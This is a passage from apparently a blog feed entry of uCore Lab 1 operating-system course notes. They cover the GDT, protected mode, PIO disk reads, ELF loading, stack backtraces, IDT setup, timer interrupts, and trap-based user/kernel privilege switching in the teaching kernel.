0xdf = 11011111, means set P2&#x27;</span>s A20 bit(the <span class="number">1</span> bit) to <span 
class="number">1</span></span><br></pre></td></tr></table></figure></li><li><p>How is the GDT initialized?</p><ul><li>The first descriptor in the GDT is set to null.</li><li>The second descriptor in the GDT is used for the code segment, with readable and executable attributes.</li><li>The third descriptor in the GDT is used for the data segment, with readable and writable attributes.</li></ul><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  # Bootstrap GDT</span><br><span class="line"><span class="meta">.p2align</span> <span class="number">2</span>                                          # force <span class="number">4</span> <span class="built_in">byte</span> alignment</span><br><span class="line"><span class="symbol">gdt:</span></span><br><span class="line">    SEG_NULLASM                                     # null <span class="built_in">seg</span></span><br><span class="line">    SEG_ASM(STA_X|STA_R, <span class="number">0x0</span>, <span class="number">0xffffffff</span>)           # code <span class="built_in">seg</span> for bootloader <span class="keyword">and</span> kernel</span><br><span class="line">    SEG_ASM(STA_W, <span class="number">0x0</span>, <span class="number">0xffffffff</span>)                 # data <span class="built_in">seg</span> for bootloader <span class="keyword">and</span> kernel</span><br><span class="line"><span class="symbol"></span></span><br><span class="line"><span class="symbol">gdtdesc:</span></span><br><span class="line"><span class="meta">    .word</span> <span class="number">0x17</span>                                      # sizeof(gdt) - <span class="number">1</span></span><br><span class="line"><span class="meta">    .long</span> gdt                                       # address 
gdt</span><br></pre></td></tr></table></figure></li><li><p>How is protected mode enabled and entered?</p><ul><li>Set the PE bit (bit 0) of the %cr0 register to 1.</li><li>After the PE bit is set, perform the long jump <code>ljmp $PROT_MODE_CSEG, $protcseg</code> to reload cs and update its base address.</li></ul></li></ul><h3 id="4-练习4">4. Exercise 4</h3><blockquote><p>Analyze how the bootloader loads an OS in ELF format.</p></blockquote><ul><li><p>How does the bootloader read disk sectors?</p><ul><li><p>After the bootloader puts the CPU into protected mode, its next job is to load the OS from disk and run it. To keep the implementation simple, the bootloader accesses the disk in LBA mode using PIO (Program IO), meaning that every I/O operation is carried out by the CPU accessing the disk's I/O address registers. The disk-related I/O addresses and their functions are:</p><table><thead><tr><th style="text-align:center">I/O address</th><th style="text-align:left">Function</th></tr></thead><tbody><tr><td style="text-align:center">0x1f0</td><td style="text-align:left">Data port. Data can be read when 0x1f7 reports not busy.</td></tr><tr><td style="text-align:center">0x1f2</td><td style="text-align:left">Number of sectors to read or write. Set it before every read or write; the minimum is 1 sector</td></tr><tr><td style="text-align:center">0x1f3</td><td style="text-align:left">In LBA mode, bits 0-7 of the LBA parameter</td></tr><tr><td style="text-align:center">0x1f4</td><td style="text-align:left">In LBA mode, bits 8-15 of the LBA parameter</td></tr><tr><td style="text-align:center">0x1f5</td><td style="text-align:left">In LBA mode, bits 16-23 of the LBA parameter</td></tr><tr><td style="text-align:center">0x1f6</td><td style="text-align:left">Bits 0-3: in LBA mode, bits 24-27 of the LBA parameter. Bit 4: 0 for the master disk, 1 for the slave disk</td></tr><tr><td style="text-align:center">0x1f7</td><td style="text-align:left">Status and command register. Issue the command first, then read the status; when the disk is not busy, read the data from port 0x1f0</td></tr></tbody></table></li><li><p>Disk data is stored in sectors, and each sector is 512 bytes. Reading one sector goes roughly as follows:</p><ul><li>Wait for the disk to be ready</li><li>Issue the read-sector command</li><li>Wait for the disk to be ready</li><li>Read the sector data into the target memory</li></ul></li><li><p>The implementation is as follows</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* waitdisk - wait for disk ready */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">waitdisk</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取并判断磁盘是否处于忙碌状态</span></span><br><span class="line">    <span class="keyword">while</span> ((<span class="built_in">inb</span>(<span class="number">0x1F7</span>) &amp; <span class="number">0xC0</span>) != <span class="number">0x40</span>)</span><br><span class="line">        <span class="comment">/* do nothing */</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* readsect - read a single sector at @secno into @dst */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">readsect</span><span class="params">(<span class="type">void</span> *dst, <span class="type">uint32_t</span> secno)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 等待磁盘准备就绪</span></span><br><span class="line">    <span class="built_in">waitdisk</span>();</span><br><span class="line">    <span class="comment">// 设置磁盘参数</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F2</span>, <span class="number">1</span>);                         <span class="comment">// 读取1个扇区</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F3</span>, secno &amp; 
<span class="number">0xFF</span>);              <span class="comment">// 0x1F3-0x1F6 设置LBA模式的参数</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F4</span>, (secno &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F5</span>, (secno &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F6</span>, ((secno &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xF</span>) | <span class="number">0xE0</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F7</span>, <span class="number">0x20</span>);                      <span class="comment">// 设置磁盘命令为“读取”</span></span><br><span class="line">    <span class="comment">// 等待磁盘准备就绪</span></span><br><span class="line">    <span class="built_in">waitdisk</span>();</span><br><span class="line">    <span class="comment">// 从0x1F0端口处读数据</span></span><br><span class="line">    <span class="built_in">insl</span>(<span class="number">0x1F0</span>, dst, SECTSIZE / <span class="number">4</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>bootloader是如何加载ELF格式的OS？</p><ul><li><p>bootloader先将ELF格式的OS加载到地址<code>0x10000</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">readseg</span>((<span class="type">uintptr_t</span>)ELFHDR, SECTSIZE * <span class="number">8</span>, <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li><li><p>之后通过比对ELF的magic number来判断读入的ELF文件是否正确。</p></li><li><p>再将ELF中每个段都加载到特定的地址。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// load each program segment (ignores ph flags)</span></span><br><span class="line">ph = (<span class="keyword">struct</span> proghdr *)((<span class="type">uintptr_t</span>)ELFHDR + ELFHDR-&gt;e_phoff);</span><br><span class="line">eph = ph + ELFHDR-&gt;e_phnum;</span><br><span class="line"><span class="keyword">for</span> (; ph &lt; eph; ph ++)</span><br><span class="line">    <span class="built_in">readseg</span>(ph-&gt;p_va &amp; <span class="number">0xFFFFFF</span>, ph-&gt;p_memsz, ph-&gt;p_offset);</span><br></pre></td></tr></table></figure></li><li><p>最后跳转至ELF文件的程序入口点(entry point)。</p></li></ul></li></ul><h3 id="5-练习5">5. 练习5</h3><blockquote><p>实现函数调用堆栈跟踪函数.</p></blockquote><ul><li><p>具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">+|  栈底方向    | 高位地址</span></span><br><span class="line"><span class="comment"> |    ...       |</span></span><br><span class="line"><span class="comment"> |    ...       |</span></span><br><span class="line"><span class="comment"> |  参数3       |</span></span><br><span class="line"><span class="comment"> |  参数2       |</span></span><br><span class="line"><span class="comment"> |  参数1       |</span></span><br><span class="line"><span class="comment"> |  返回地址     |</span></span><br><span class="line"><span class="comment"> |  上一层[ebp]  | &lt;-------- [ebp]</span></span><br><span class="line"><span class="comment"> |  局部变量     |  低位地址</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">print_stackframe</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 读取当前栈帧的ebp和eip</span></span><br><span class="line">    <span class="type">uint32_t</span> ebp = <span class="built_in">read_ebp</span>();</span><br><span class="line">    <span class="type">uint32_t</span> eip = <span class="built_in">read_eip</span>();</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">uint32_t</span> i = <span class="number">0</span>; ebp != <span class="number">0</span> &amp;&amp; i &lt; STACKFRAME_DEPTH; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 读取</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;ebp:0x%08x eip:0x%08x args:&quot;</span>, ebp, eip);</span><br><span class="line">        <span class="type">uint32_t</span>* args = (<span class="type">uint32_t</span>*)ebp + <span class="number">2</span> ;</span><br><span 
class="line">        <span class="keyword">for</span>(<span class="type">uint32_t</span> j = <span class="number">0</span>; j &lt; <span class="number">4</span>; j++)</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;0x%08x &quot;</span>, args[j]);</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">        <span class="comment">// eip指向异常指令的下一条指令，所以要减1</span></span><br><span class="line">        <span class="built_in">print_debuginfo</span>(eip<span class="number">-1</span>);</span><br><span class="line">        <span class="comment">// 将ebp 和eip设置为上一个栈帧的ebp和eip</span></span><br><span class="line">        <span class="comment">//  注意要先设置eip后设置ebp，否则当ebp被修改后，eip就无法找到正确的位置</span></span><br><span class="line">        eip = *((<span class="type">uint32_t</span>*)ebp + <span class="number">1</span>);</span><br><span class="line">        ebp = *(<span class="type">uint32_t</span>*)ebp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>有几个点需要注意一下</p><ul><li>栈的方向是从高地址向低地址增长，切勿弄错方向。</li><li>指针运算要格外小心，避免因为错误的运算顺序(例如先相加，再强制转换为指针类型)而导致指针的运算错误。</li><li><code>eip</code>指向异常指令的下一条指令，所以要传入<code>print_debuginfo</code>的参数为<code>eip-1</code></li><li>在切换栈帧时，先切换<code>eip</code>，后切换<code>ebp</code>，两者顺序不能颠倒。原因是当先切换ebp后，再切换的eip是已切换后的栈帧的上一个栈帧eip。eip隔着一个栈帧进行了切换，会导致输出错误。</li><li>如果想与标准答案比对自己的输出信息是否正确，请运行<code>labcodes_answer/kern/debug/kdebug.c</code>中的<code>print_stackframe</code>.</li></ul></li></ul><h3 id="6-练习6">6. 
练习6</h3><blockquote><p>完善中断初始化和处理</p></blockquote><ul><li><p>中断描述符表（也可简称为保护模式下的中断向量表）中一个表项占多少字节？其中哪几位代表中断处理代码的入口？</p><ul><li><p>一个表项的结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Gate descriptors for interrupts and traps */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">gatedesc</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> gd_off_15_0 : <span class="number">16</span>;        <span class="comment">// low 16 bits of offset in segment</span></span><br><span class="line">    <span class="type">unsigned</span> gd_ss : <span class="number">16</span>;            <span class="comment">// segment selector</span></span><br><span class="line">    <span class="type">unsigned</span> gd_args : <span class="number">5</span>;            <span class="comment">// # args, 0 for interrupt/trap gates</span></span><br><span class="line">    <span class="type">unsigned</span> gd_rsv1 : <span class="number">3</span>;            <span class="comment">// reserved(should be zero I guess)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_type : <span class="number">4</span>;            <span class="comment">// type(STS_&#123;TG,IG32,TG32&#125;)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_s : <span class="number">1</span>;                <span class="comment">// must be 0 (system)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_dpl : <span 
class="number">2</span>;            <span class="comment">// descriptor(meaning new) privilege level</span></span><br><span class="line">    <span class="type">unsigned</span> gd_p : <span class="number">1</span>;                <span class="comment">// Present</span></span><br><span class="line">    <span class="type">unsigned</span> gd_off_31_16 : <span class="number">16</span>;        <span class="comment">// high bits of offset in segment</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>该表项的大小为<code>16+16+5+3+4+1+2+1+16 == 8*8</code>bit，即<strong>8字节</strong>。</p></li><li><p>根据IDT表项的结构，我们可以得知，IDT表项的第二个成员<code>gd_ss</code>为段选择子，第一个成员<code>gd_off_15_0</code>和最后一个成员<code>gd_off_31_16</code>共同组成一个段内偏移地址。根据段选择子和段内偏移地址就可以得出中断处理程序的地址。</p></li></ul></li><li><p>编程完善kern/trap/trap.c中对中断向量表进行初始化的函数idt_init.</p><ul><li><p>具体实现如下，详细信息以注释的形式写入代码中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">idt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// __vectors定义于vector.S中</span></span><br><span class="line">  <span class="keyword">extern</span> <span class="type">uintptr_t</span> __vectors[];</span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span 
class="number">0</span>; i &lt; <span class="built_in">sizeof</span>(idt) / <span class="built_in">sizeof</span>(<span class="keyword">struct</span> gatedesc); i ++)</span><br><span class="line">      <span class="comment">// 目标idt项为idt[i]</span></span><br><span class="line">      <span class="comment">// 该idt项为内核代码，所以使用GD_KTEXT段选择子</span></span><br><span class="line">      <span class="comment">// 中断处理程序的入口地址存放于__vectors[i]</span></span><br><span class="line">      <span class="comment">// 特权级为DPL_KERNEL</span></span><br><span class="line">      <span class="built_in">SETGATE</span>(idt[i], <span class="number">0</span>, GD_KTEXT, __vectors[i], DPL_KERNEL);</span><br><span class="line">  <span class="comment">// 设置从用户态转为内核态的中断的特权级为DPL_USER</span></span><br><span class="line">  <span class="built_in">SETGATE</span>(idt[T_SWITCH_TOK], <span class="number">0</span>, GD_KTEXT, __vectors[T_SWITCH_TOK], DPL_USER);</span><br><span class="line">  <span class="comment">// 加载该IDT</span></span><br><span class="line">  <span class="built_in">lidt</span>(&amp;idt_pd);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>编程完善trap.c中的中断处理函数trap，在对时钟中断进行处理的部分填写trap函数中处理时钟中断的部分，使操作系统每遇到100次时钟中断后，调用print_ticks子程序，向屏幕上打印一行文字”100 ticks”。</p><ul><li><p>这个实现还是比较简单的，具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* trap_dispatch - dispatch based on what type of trap occurred */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> 
<span class="title">trap_dispatch</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span> c;</span><br><span class="line">    <span class="keyword">switch</span> (tf-&gt;tf_trapno) &#123;</span><br><span class="line">    <span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        <span class="comment">// 全局变量ticks定义于kern/driver/clock.c</span></span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="keyword">if</span>(ticks % TICK_NUM == <span class="number">0</span>)</span><br><span class="line">            <span class="built_in">print_ticks</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="comment">// .........</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="7-扩展练习">7. 扩展练习</h3><blockquote><p>请注意：强烈建议学习完lab2中<strong>特权级切换</strong>的相关知识后再完成该扩展练习。</p></blockquote><h4 id="1-Challenge-1">1) Challenge 1</h4><blockquote><p>增加一组切换特权级的函数。当内核初始完毕后，可从内核态返回到用户态的函数，而用户态的函数又通过系统调用得到内核态的服务</p></blockquote><blockquote><p>部分讲解以注释的形式写入代码中。更详细的讲解请查看<a href="#3-%E9%80%9A%E8%BF%87%E4%B8%AD%E6%96%AD%E5%88%87%E6%8D%A2%E7%89%B9%E6%9D%83%E7%BA%A7">通过中断切换特权级</a></p></blockquote><ul><li><p>用户态转内核态</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Global variable</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> *switchu2k;</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"><span class="keyword">case</span> T_SWITCH_TOK:</span><br><span class="line">    <span class="keyword">if</span> (tf-&gt;tf_cs != KERNEL_CS) &#123;</span><br><span class="line">    <span class="comment">// Switch to the kernel code/data segments and clear IOPL to raise the privilege level</span></span><br><span class="line">    tf-&gt;tf_cs = KERNEL_CS;</span><br><span class="line">    tf-&gt;tf_ds = tf-&gt;tf_es = KERNEL_DS;</span><br><span class="line">    tf-&gt;tf_eflags &amp;= ~FL_IOPL_MASK;</span><br><span class="line">    <span class="comment">// Compute the address on the user stack where the new trapframe will be stored</span></span><br><span class="line">    <span class="comment">//    Subtract 8 because iret back to kernel mode does not pop ss and esp, so those 8 bytes are not needed</span></span><br><span class="line">    switchu2k = (<span class="keyword">struct</span> trapframe *)(tf-&gt;tf_esp - (<span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>));</span><br><span class="line">    <span class="comment">// Write the modified trapframe onto the user stack (we are currently on the kernel stack); ss and esp in the trapframe need not be copied.</span></span><br><span class="line">    <span class="built_in">memmove</span>(switchu2k, tf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>);</span><br><span class="line">    <span class="comment">// Make the esp popped after trap() returns point to the new frame on the user stack</span></span><br><span class="line">    *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)switchu2k;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">break</span>;</span><br></pre></td></tr></table></figure></li><li><p>Kernel mode to user mode</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Global variable</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> switchk2u;</span><br><span class="line"><span class="comment">// ......</span></span><br><span class="line"><span class="keyword">case</span> T_SWITCH_TOU:</span><br><span class="line">    <span class="keyword">if</span> (tf-&gt;tf_cs != USER_CS) &#123;</span><br><span class="line">    <span class="comment">// Copy the interrupt's trapframe into the temporary trapframe</span></span><br><span class="line">    switchk2u = *tf;</span><br><span class="line">    <span class="comment">// Switch the code segment to USER_CS</span></span><br><span class="line">    switchk2u.tf_cs = USER_CS;</span><br><span class="line">    <span class="comment">// Switch the data segments to USER_DS</span></span><br><span class="line">    switchk2u.tf_ds = switchk2u.tf_es = switchk2u.tf_ss = USER_DS;</span><br><span class="line">    <span class="comment">// Set the stack address to use after returning from the interrupt handler</span></span><br><span class="line">    <span class="comment">//    Subtract 8 because the interrupt was raised in kernel mode, so the CPU pushed no ss/esp and the frame on the stack is 8 bytes shorter</span></span><br><span class="line">    switchk2u.tf_esp = (<span class="type">uint32_t</span>)tf + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span 
class="number">8</span>;</span><br><span class="line">    <span class="comment">// So that the program can still perform I/O at the lower privilege level,</span></span><br><span class="line">    <span class="comment">// set the IOPL field in eflags to 3, the user-mode level</span></span><br><span class="line">    switchk2u.tf_eflags |= FL_IOPL_MASK;</span><br><span class="line">    <span class="comment">// Set the %esp that is popped when the interrupt handler finishes, so the context is restored from the modified data.</span></span><br><span class="line">    *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)&amp;switchk2u;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// In fact, the code above does not actually switch from the kernel stack to a user-mode stack;</span></span><br><span class="line">    <span class="comment">// it only switches the privilege level. This is expected.</span></span><br><span class="line"><span class="keyword">break</span>;</span><br></pre></td></tr></table></figure></li><li><p>Code that triggers the switch with the int instruction</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">lab1_switch_to_user</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span 
class="line"><span class="params"><span class="function">        <span class="string">&quot;int %0 \n&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        :</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span>(T_SWITCH_TOU)</span></span></span><br><span class="line"><span class="params"><span class="function">    )</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">lab1_switch_to_kernel</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="string">&quot;int %0 \n&quot;</span></span></span></span><br><span class="line"><span class="params"><span class="function">        :</span></span></span><br><span class="line"><span class="params"><span class="function">        : <span class="string">&quot;i&quot;</span>(T_SWITCH_TOK)</span></span></span><br><span class="line"><span class="params"><span class="function">    )</span></span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>虽然在修改特权级的代码中，修改CPL和DPL是以赋值的形式而不是以位运算的形式来修改，但内核仍然可以正常工作，因为在Lab1中，GDT中所有段描述符的基地址<strong>都是相同的值</strong>—— <strong>0</strong> 。</p></blockquote><h4 id="2-Challenge-2">2) Challenge 2</h4><blockquote><p>用键盘实现用户模式内核模式切换。具体目标是：“键盘输入3时切换到用户模式，键盘输入0时切换到内核模式”。</p></blockquote><ul><li>切换内核的代码直接照搬<code>Challenge 1</code>的代码即可。</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// in `trap_dispatch` of `trap.c`</span></span><br><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_KBD:</span><br><span class="line">    c = <span class="built_in">cons_getc</span>();</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;kbd [%03d] %c\n&quot;</span>, c, c);</span><br><span class="line">    <span class="comment">// 切换特权级的代码直接照抄之前编写的代码</span></span><br><span class="line">    <span class="keyword">if</span>(c == <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (tf-&gt;tf_cs != KERNEL_CS) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;+++ switch to  kernel  mode +++\n&quot;</span>);</span><br><span class="line">            tf-&gt;tf_cs = KERNEL_CS;</span><br><span class="line">            
tf-&gt;tf_ds = tf-&gt;tf_es = KERNEL_DS;</span><br><span class="line">            tf-&gt;tf_eflags &amp;= ~FL_IOPL_MASK;</span><br><span class="line">            switchu2k = (<span class="keyword">struct</span> trapframe *)(tf-&gt;tf_esp - (<span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>));</span><br><span class="line">            <span class="built_in">memmove</span>(switchu2k, tf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>);</span><br><span class="line">            *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)switchu2k;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span>(c == <span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    &#123;</span><br><span class="line">          <span class="keyword">if</span> (tf-&gt;tf_cs != USER_CS) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;+++ switch to  user  mode +++\n&quot;</span>);</span><br><span class="line">            switchk2u = *tf;</span><br><span class="line">            switchk2u.tf_cs = USER_CS;</span><br><span class="line">            switchk2u.tf_ds = switchk2u.tf_es = switchk2u.tf_ss = USER_DS;</span><br><span class="line">            switchk2u.tf_esp = (<span class="type">uint32_t</span>)tf + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe) - <span class="number">8</span>;</span><br><span class="line">            switchk2u.tf_eflags |= FL_IOPL_MASK;</span><br><span class="line">            *((<span class="type">uint32_t</span> *)tf - <span class="number">1</span>) = (<span class="type">uint32_t</span>)&amp;switchk2u;</span><br><span class="line">        
&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>]]></content>
    
    
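    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are some notes I wrote while completing uCore Lab 1.&lt;/li&gt;
&lt;li&gt;They cover CPU real mode, interrupt handling, privilege level switching, and more.&lt;/li&gt;
&lt;li&gt;There is a lot of material, so using the navigation bar on the right is recommended.&lt;/li&gt;
&lt;/ul&gt;</summary>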
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
